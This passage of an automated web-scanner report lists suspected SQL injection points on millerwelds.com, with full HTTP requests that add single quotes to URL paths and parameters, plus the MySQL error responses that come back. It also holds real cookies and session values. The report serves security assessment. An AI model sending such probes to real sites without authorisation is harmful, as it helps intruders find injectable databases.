Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:41 GMT
Connection: Keep-Alive
Content-Length: 15803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.91. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.millerwelds.com
Path:	/financing/images/powerline_bg.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/images/powerline_bg.png' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:51 GMT
Connection: Keep-Alive
Content-Length: 27752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/images/powerline_bg.png''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/images/powerline_bg.png'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:52 GMT
Connection: Keep-Alive
Content-Length: 29417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...

1.92. http://www.millerwelds.com/financing/images/powerline_bg.png [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.millerwelds.com
Path:	/financing/images/powerline_bg.png

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/images/powerline_bg.png?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:44 GMT
Connection: Keep-Alive
Content-Length: 27720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/images/powerline_bg.png?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:45 GMT
Connection: Keep-Alive
Content-Length: 29417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...

1.93. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.millerwelds.com
Path:	/images/footer-bootm-bg.jpg

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/footer-bootm-bg.jpg?9 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:07 GMT
Connection: Keep-Alive
Content-Length: 27711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?9'' at line 1)<br>
...[SNIP]...

1.94. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.millerwelds.com
Path:	/images/footer-bootm-bg.jpg

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/footer-bootm-bg.jpg'?9 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:09 GMT
Connection: Keep-Alive
Content-Length: 27710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?9'' at line 1)<br>
...[SNIP]...

1.95. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.millerwelds.com
Path:	/images/footer-top-bg.jpg

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/footer-top-bg.jpg?2 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:07 GMT
Connection: Keep-Alive
Content-Length: 27709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?2'' at line 1)<br>
...[SNIP]...

1.96. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.millerwelds.com
Path:	/images/footer-top-bg.jpg

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/footer-top-bg.jpg'?2 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:09 GMT
Connection: Keep-Alive
Content-Length: 27708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?2'' at line 1)<br>
...[SNIP]...

1.97. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.millerwelds.com
Path:	/images/header-background.jpg

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/header-background.jpg?3 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:11 GMT
Connection: Keep-Alive
Content-Length: 27713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?3'' at line 1)<br>
...[SNIP]...

1.98. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.millerwelds.com
Path:	/images/header-background.jpg

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/header-background.jpg'?3 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:14 GMT
Connection: Keep-Alive
Content-Length: 27712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?3'' at line 1)<br>
...[SNIP]...

1.99. http://www.millerwelds.com/landing/drive/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.millerwelds.com
Path:	/landing/drive/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /landing'/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:03:45 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=9905841C246A3A99C9CE2CAD5451F256; path=/
Content-Length: 27866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_con' at line 1)<br>
...[SNIP]...

1.100. http://www.millerwelds.com/landing/drive/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.millerwelds.com
Path:	/landing/drive/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /landing/drive'/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:04:11 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=D039342996A35FFDFB087F94CB6EE307; path=/
Content-Length: 27865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_con' at line 1)<br>
...[SNIP]...

1.101. http://www.millerwelds.com/landing/drive/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.millerwelds.com
Path:	/landing/drive/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online&1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:02:56 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=E444AE3598B28A98BE68F16717293482; path=/
Content-Length: 14910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online&1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:02:58 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=9905841C246A3A99C9CE2CAD5451F256; path=/
Content-Length: 16533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

1.102. http://www.millerwelds.com/landing/drive/ [utm_campaign parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.millerwelds.com
Path:	/landing/drive/

Issue detail

The utm_campaign parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the utm_campaign parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive'&utm_medium=bannerad&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:01:43 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=33DA6723A49CE218C1D7BD1E4A7A789A; path=/
Content-Length: 14906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive''&utm_medium=bannerad&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:01:44 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; path=/
Content-Length: 16533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

1.103. http://www.millerwelds.com/landing/drive/ [utm_content parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.millerwelds.com
Path:	/landing/drive/

Issue detail

The utm_content parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the utm_content parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:02:32 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=B0FC82155C2EC3F1BBBD167B0997AEA7; path=/
Content-Length: 14985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
